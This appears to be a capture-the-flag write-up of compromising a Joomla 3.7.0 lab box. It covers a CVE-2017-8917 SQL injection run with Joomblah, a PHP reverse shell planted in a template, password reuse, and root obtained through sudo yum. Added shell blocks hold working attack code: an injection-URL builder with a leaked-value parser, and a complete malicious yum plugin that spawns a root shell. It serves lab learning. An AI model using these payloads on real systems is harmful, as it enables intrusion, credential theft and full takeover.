
Reconnaissance
After deployment, I started by simply browsing to http://trgt/. It loaded a Joomla webpage where I immediately found the first answer. The spelling was different; I had to replace a character for it to be accepted.
Joomla Version
I checked the Joomla version by requesting http://trgt/administrator/manifests/files/joomla.xml, the manifest file Joomla ships world-readable, which gave me the second answer.
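The version check above is a one-line fingerprint, but it is worth turning into something repeatable. The following is an added example (not from the original writeup) that pulls the version element out of a Joomla manifest and gates on it: CVE-2017-8917 affects Joomla 3.7.0 only, with the fix shipped in 3.7.1. The sample manifest is constructed for the example; the live target would be read with the curl command shown in the comment.

```shell
#!/bin/sh
# Added example, not the original writeup's commands: fingerprint Joomla from
# its public manifest and decide whether CVE-2017-8917 (Joomla 3.7.0) applies.

# Extract the <version> element from a Joomla manifest supplied on stdin.
# The <extension version="..."> attribute on the root element is deliberately
# not matched: the pattern requires a literal "<version>" tag.
joomla_version_from_manifest() {
    sed -n 's/.*<version>\([^<]*\)<\/version>.*/\1/p' | head -n 1
}

# CVE-2017-8917 is specific to 3.7.0 (fixed in 3.7.1). Return 0 if vulnerable.
is_cve_2017_8917_vulnerable() {
    [ "$1" = "3.7.0" ]
}

# Constructed sample manifest, trimmed to the elements that matter.
SAMPLE_MANIFEST='<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <version>3.7.0</version>
</extension>'

# Offline demo on the constructed manifest (prints 3.7.0 and "vulnerable").
v=$(printf '%s' "$SAMPLE_MANIFEST" | joomla_version_from_manifest)
echo "$v"
if is_cve_2017_8917_vulnerable "$v"; then echo "vulnerable"; else echo "not affected"; fi

# Live use against the target would be:
#   curl -s http://trgt/administrator/manifests/files/joomla.xml | joomla_version_from_manifest
```

A strict equality check is correct here because the advisory covers a single release; for CVEs spanning a range you would compare components numerically instead.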
Exploitation
The Joomla CMS was vulnerable to CVE-2017-8917↗, an SQLi vulnerability. I used Joomblah↗ to exploit this vulnerability.
$ python3 joomblah.py http://trgt/
[ASCII art banner omitted]
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '<password hash>', '', '']
- Extracting sessions from fb9j5_session
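Joomblah does the extraction for you, but it helps to see the two moving parts it automates. The block below is an added example, not Joomblah's code: the unauthenticated endpoint and the list[fullordering] parameter are taken from the public description of CVE-2017-8917 (an ORDER BY injection in com_fields), while the exact error-based payload shape (updatexml() reflecting a marked value in a MySQL XPATH error that Joomla then displays) is an assumption chosen for the example. The sample HTML response is constructed.

```shell
#!/bin/sh
# Added example, not Joomblah's code: build the CVE-2017-8917 injection URL and
# cut the leaked value out of the MySQL error page Joomla 3.7.0 returns.

# Build the injection URL for a base URL and a SQL expression that yields one value.
# Only the characters the shell would otherwise mangle are URL-encoded by hand.
cve_2017_8917_url() {
    base="$1"; sql="$2"
    # 0x7e is '~', prepended as a marker so the value can be cut out of the error.
    payload="updatexml(0x7e,concat(0x7e,($sql)),1)"
    printf '%sindex.php?option=com_fields&view=fields&layout=modal&list[fullordering]=%s' \
        "$base" "$(printf '%s' "$payload" | sed 's/ /%20/g; s/(/%28/g; s/)/%29/g; s/,/%2C/g')"
}

# Pull the marked value out of a response body supplied on stdin.
# MySQL reports the bad XPath as: XPATH syntax error: '~<value>'
extract_leaked_value() {
    sed -n "s/.*XPATH syntax error: '~\([^']*\)'.*/\1/p" | head -n 1
}

# Constructed sample response, standing in for the error page the server returns.
SAMPLE_RESPONSE="<div class=\"alert alert-error\">XPATH syntax error: '~fb9j5_users'</div>"

# Offline demo: the URL that would be requested, and the value parsed from the page.
cve_2017_8917_url "http://trgt/" "select table_name from information_schema.tables where table_name like 0x2575736572732 limit 1"
echo
printf '%s' "$SAMPLE_RESPONSE" | extract_leaked_value

# Live use would be: curl -s "$(cve_2017_8917_url http://trgt/ "$SQL")" | extract_leaked_value
```

Note that updatexml() truncates the reflected text to 32 characters, which is why tools like Joomblah page through long values (a password hash, for instance) with substring() rather than pulling them in one request.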
Cracking the password hash gave me a working login for the "Super User" account. I went to http://trgt/administrator/, which allowed me to log in.
Foothold
Getting a foothold on the Joomla server was very similar to a WordPress server: log in as a privileged user, go to themes / templates, add your own PHP reverse shell and profit.
For a reverse shell I used pentestmonkey↗'s PHP Reverse Shell↗. This was easily and quickly done using revshells↗.
I stabilized the shell by running
$ python -c 'import pty;pty.spawn("/bin/bash")'
(python3 wasn't available on the box), then pressing CTRL + Z and running
$ stty raw -echo; fg
$ export TERM=xterm
which gave me a better and more usable shell.
Privilege Escalation
Shell as jjameson
Looking at /home/, I saw a user called "jjameson", but the home directory was locked down.
Looking around further, I found configuration.php in /var/www/html/, which stored MySQL credentials.
The MySQL database wasn't all that interesting, so I tried logging in as the user with the same password (plain password reuse), which worked and gave me the user flag.
Shell as root
Running a simple sudo -l showed that "jjameson" could run yum with root privileges. Looking it up on GTFOBins↗ gave me the information needed to get a root shell and therefore the root flag.
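The GTFOBins entry the writeup refers to works by pointing yum at an attacker-controlled plugin directory; yum imports the plugin and calls its init hook while already running as root. The block below is an added example of that technique (the file layout follows the GTFOBins sudo/yum entry; it is not the original writeup's command sequence) and assumes a classic Python-based yum, as on CentOS 7. The scratch directory path is whatever mktemp -d returns.

```shell
#!/bin/sh
# Added example, not the original writeup's commands: GTFOBins-style sudo yum
# escape. A yum config file redirects plugin lookup to a directory we control;
# the plugin's init_hook runs as root and replaces yum with a shell.

# Write the yum config, the plugin config and the plugin into "$1", then print
# the command that triggers the root shell (so the caller can review it first).
build_yum_plugin_escape() {
    dir="$1"
    mkdir -p "$dir"

    # yum.conf replacement: enable plugins and point both plugin paths at $dir.
    cat > "$dir/x" <<EOF
[main]
plugins=1
pluginpath=$dir
pluginconfpath=$dir
EOF

    # Per-plugin config for a plugin named "y".
    cat > "$dir/y.conf" <<EOF
[main]
enabled=1
EOF

    # The plugin. yum imports y.py and calls init_hook() before doing any work;
    # execl replaces the root-owned yum process with /bin/sh.
    cat > "$dir/y.py" <<'EOF'
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE

requires_api_version = '2.1'

def init_hook(conduit):
    os.execl('/bin/sh', '/bin/sh')
EOF

    printf 'sudo yum -c %s/x --enableplugin=y\n' "$dir"
}

# Usage on the target (run as jjameson, who may sudo yum):
#   TF=$(mktemp -d)
#   build_yum_plugin_escape "$TF"      # prints: sudo yum -c $TF/x --enableplugin=y
#   sudo yum -c "$TF/x" --enableplugin=y
```

The defensive takeaway is the same as for any package manager in sudoers: yum honours a caller-supplied -c config and plugin directories, so "may run yum as root" is equivalent to unrestricted root. On dnf-based systems where yum is a symlink, the plugin API differs and this exact file layout does not apply.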